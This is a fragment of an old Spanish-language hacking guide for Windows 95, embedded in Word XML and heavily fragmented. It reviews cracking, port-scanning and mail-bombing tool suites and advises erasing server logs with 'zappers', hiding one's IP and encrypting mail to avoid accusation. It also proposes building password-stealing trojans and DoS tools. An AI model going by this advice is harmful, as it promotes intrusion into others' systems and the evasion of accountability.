      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>words prcessing -&gt; words wizard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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>xtrakt word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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sort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Tools -&gt; create &amp; fill a dummy fill, compare binary file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Network -&gt; finger, port scanner, ip &lt;&gt; name converte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Other Stuff -&gt; hackers's test, serial numbers, extracting/ripping sound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files, extracting/ripping graphic files, manual extract/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rip file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System -&gt; dos prompt, run custom application, shut dow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Window -&gt; cascade, tile horizontal, tile vertical, arrange icons,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>main toolbar, main status bar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Help -&gt; tip of day, index, using help, about Hacker's Utility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verdad es que esta suite esta muy completa y nos sera de gran ayuda.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jemplo el sistema se puede configurar en File-&gt;HU setup para que sea m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ersonal. Cabe destacar ciertas utilidades como los crackeadores que tien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corporados para crackear el passwd de un Unix o romper el password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 fichero zip. Luego en la seccion de Network, las utilidades nos sera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mucha ayuda, como el Finger, el scaneador de puertos y el convertid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direcciones IP. Esto en mi opion seria lo mejor del programa per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uego trae otras cosas que tambien nos pueden servir para al men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vertinos un rato, esto es el caso del Hacker's Test, por ejemplo pod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ctivar el Port Scanner y mientras esperamos a los resultados pod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cer un test para saber si somos buenos Hacker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verdad es que es una magnifica herramienta que los Hackers de win deb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ene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l. Haktek v1.1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 igual que el HU, Haktek, es una suite que tambien nos sera de gra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yuda. Pero esta suite esta mas enfocada a atacar por Internet, logicam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 el peligro que ello conllev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 ejecutar el programa, se abrira una ventana en la que veremos una seri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iconos en la parte izquierda de la ventana y una pantalla de texto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s explica cada icono. Empezando de arriba para abajo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skette-&gt; graba la sesion (lo que esta en pantalla y lo que hallamos hecho</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>con el programa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X -&gt; prepara la sesion, borrando la pantalla de tex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? -&gt; nos habla sobre sus autor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irculo -&gt; se¤alos un objetivo, por defecto www.microsoft.com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ntena -&gt; Utilidad ping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afas -&gt; scaneador de puert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omba -&gt; bombardeador de corre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op bomb -&gt; para protegernos de un mailbombe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adio -&gt; scaneador de IP'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ismaticos -&gt; para enviar finger nul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verdad es que es una suite muy completa y nos ayudara a joder a to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l que se ponga por delante. Con un poco de practica dominaremos es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ograma a la perfec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5m. Claymore Brute Forc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utlidad no sera de gran ayuda para desemcriptar passowrd's de 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chero passwd de Unix. Cuando lo ejecutemos se abrira una ventana co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varias opciones, de facil manejo, para aquellos que quieren algo simple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rriendo sobre win95. Este crackeador es de fuerza bruta pudiendo se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go lent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6. Medidas De Segurida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esta seccion hablare sobre varios aspectos muy importanes, logicam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seguridad personal, de nuestro ordenador, etc... Para que nadie pued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jodernos aunque nos movamos por Win95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6a. Protegiendo Nuestro Ordenador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uestro ordenador corriendo con Win95, sera propenso a muchos tipos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taques diferentes. Por ello conviene estar preparado y sobre est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lerta sobre las nuevas cosas que surgen por el mundo Underground, el mej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dio son los e-zines y por supuesto buenos amigos por el IRC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a1. Ataques Tipicos a Nuestro Window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gicamente seremos muy propensos a ataques tipo DoS (denial of service)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mo son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB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tc ..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estar protegidos lo que tenemos que hacer es pasarnos por l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eb's de seguridad o el de la casa Microsoft en los cuales se cuelga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s parches de estos ataques. No siempre funcioran pero nos ahorrara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uchos disgustos en muchos casos. La gente suele ser muy propensa a est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sas porque no esta informada sobre estos ataques y por consigui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demas no se instala los parches correspondient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a2. Encriptacion de Nuestra Inform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informacion sensible que tengamos en nuestro disco duro conviene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e encriptada con algun buen programa de encriptacion del tipo PGP,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l no puede ser roto en estos tiemp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ambien podemos hacer uso de la Stereografia, el arte de ocultar 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formacion. Hay varios programas en Internet que nos permiten esconde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cheros de txt en ficheros graficos o de sonido, por supuesto hab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tener cuidado cuando hacemos estas operaciones, debido a la diferenci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formatos entre los ficher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cluso podemos encriptar todo o parte del disco duro para mayor seguridad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nuestros dat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a3. Eliminar Informacion De Forma Segur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ndo borramos un fichero del disco duro, realmente no esta borrado,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 que puede ser rescatado mediante herramientas especiales. Esto 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 conveniente si por el caso nuestro ordenador cae en malos manos y n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 dado tiempo a borrar algunos ficheros, no serviria de nada ya qu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drian recuperar la inform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borrar ficheros que contegan informacion muy privada o no quer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nadie la pueda obtener, conviene borrar este fichero mediante algu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ograma especial para el borrado de ficheros. Existen por Internet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rogramas muy buenos para ello o tambien podemos leernos un ficher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bre este tema, de recomendable lectura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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Secure Deletion of Data from Magnetic and Solid-State Memory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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Peter Gutmann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>Department of Computer Science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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>University of Auckland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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pgut001@cs.auckland.ac.nz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a4. Eliminacion De Viru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s virus son una de las peores pesadillas, pero en realidad no entien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que, ya que son solo programas. Y no son dificiles de controlar. Sol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viene tener un buen antivirus o varios, si, tambien los hay por internet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 patadas y grati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cluso muchos virus se pueden anular mediante un par de comandos d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S-DOS, es simplemente conocer un poco los virus, logicamente se sale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tematica de esta guia. Pero la realidad es que no hay que tener mied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 los virus. Si nuestro ordenador esta infectado, lo primero que ten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que hacer es calmarnos, luego hacer una copia de seguridad de nuestr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sco duro (da igual si esta infectado), por si el virus, en el peor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s casos borra el disco duro y ahora buscar una vacuna disponibl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i fuese el caso que nuestro antivirus no quita el virus, pues simplemen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cemos una copia y lo enviamos a alguna empresa sobre seguridad informatic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a que seguro que nos sacan un antiviru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6b. Protegiendo Nuestras Accion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a seccion esta enfocada a esconder nuestros actos hacking por Internet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a que todo lo que hagamos dejaremos huellas y por desgracia la gente n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 entera de esto y deja muchas pist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b1. Borrando Nuestras Huella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uando conectamos a un servidor, este graba lo que hacemos (cuando hem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ectado, como, desde donde y varias cosas mas), por eso hay que tene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ucho cuidad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a mayoria de servidores que hackeemos por Internet seran unix, convien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ener a mano "zappers", son programas que borran nuestras huellas en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ervidor. Existen muchos programas para este proposito que funcionan baj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nix. Solo los tenemos que compilar en el servidor y ejecutarlos.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esgracia al usar Win95 no podemos compilarlos en nuestro ordenador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ubirlo por FTP pero algo es alg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ambien tenemos que procurar esconder nuestra IP, hay muchos metod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a ello, la mas facil es usar nodos (servidores intermedios y asi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ificultar nuestro rastreo).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6b2. Encriptando Nuestro Correo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nviene encriptar nuestro correo, sobre todo si esta relacionado con el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cking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempr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demos alegar "Privacidad en los Datos" :). Al igual que antes hay vari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quetes de PGP para mai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cluso es recomendable el uso de cuentas anomimas de correo, aunque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o la gente esta mas concenciad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7. Sugerencias Para Un Mejor Hacking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qui hablare sobre algunas ideas que pueden potenciar el hacking e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Win95 y la creacion de nuevas herramientas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 Programas troyanos que capturen el password del acceso a Interne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 Programas para IP-Spoof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 Creacion de herramientas de redes para Win95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 Wardialer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 Programas para atacar otros Win95 (DoS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 Nuevas Suit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 Programas crackeadores del passw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 Programas criptografic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- Programas eliminador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8. Obtener Inform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odo el mundo esta harto de ver cientos de web's donde no hay nada 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odo esta repetido. Pues ahora os pondre unas pautas que seguir par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obtener la mayor fuente posible de informac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- Web's sobre hack (que decir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- Web's sobre seguridad Informatica (aqui siempre podemos encontrar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muchas cosas, que nos podran servir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- Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,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etc...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- Libros de colores (Documentacion tecnica sobre seguridad en muchos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aspectos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- News (estar en un grupo de news y asi recibir noticias de lo que pasa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- Mailing lists (aqui estaremos permanentemente informados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- IRC (podremos hablar con otros hackers y cambiar opiniones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9. Despedid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ues aqui se acaba esta guia sobre hacking en Win95. Espero que os hal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ustado y os sea util, por todo el esfuerzo que ha llevado esta gui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or desgracia me he dejado muchas cosas en el tintero, que me hubies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ustado explicar pero quien sabe a lo mejor aperece una nueva entreg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unca se sabe :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Me gustaria descatar que a lo mejor con los ultimos puntos de la guia, t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has quedado sorprendido respecto a su titulo y despues al ver su contenido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sto se debe a que he preferido dar pautas a seguir y no empezar a explica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osas que ya muchos sabran o que es informacion realmente facil de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contrar por Internet, ademas si empiezo a explicar algunos de es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titulos me saldria del proposito de esta guia, que es el hacking en Win95 y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NO de otros sistemas operativos los cuales disponen de miles de gui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obre hacking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eno ya solo me queda despedirme y tened cuidado con lo que haces por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ernet, ya que un hacker no se dedica a destruir sistemas informaticos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agradecer a todos los que hallan escrito sus conocimientos sobre hack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en win95 para la creacion de esta guia!!!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9a. Agradecimient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desde aqui saludar a todos aquellos que de alguna forma han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articipado en la creacion de esta guia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- Muerte: Por su articulo de recursos compartidos.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- Pipero: Por su articulo de recursos compartido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desde aqui saludar a toda la pe¤a de #hackers, #hack &amp; #rejoin!!!!!!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Grupos como - J.J.F. / HACKERS TEAM -, CYBERHACK, WAKANDA, UNDERHACK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@pOkalypSYS y por supuesto todos los demas !!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Y por supuesto: Bisho, Meroka, Folixia, Fragel, Ipgh0st, Metalslug, Dillet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iddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, S_guy, Xus, Unix-hell,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Piotr, Muerte, Koji, Riddle, Case Zero, Nadia, Amanada, Janex, L.A. y todo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los que me dejo :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NOBODY (c) 1998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4:10:00Z</dcterms:created>
  <dc:creator>Willy</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Willy</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">1999-02-23T04:10:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>                                                                   13-01-1998</dc:title>
</cp:coreProperties>
</file>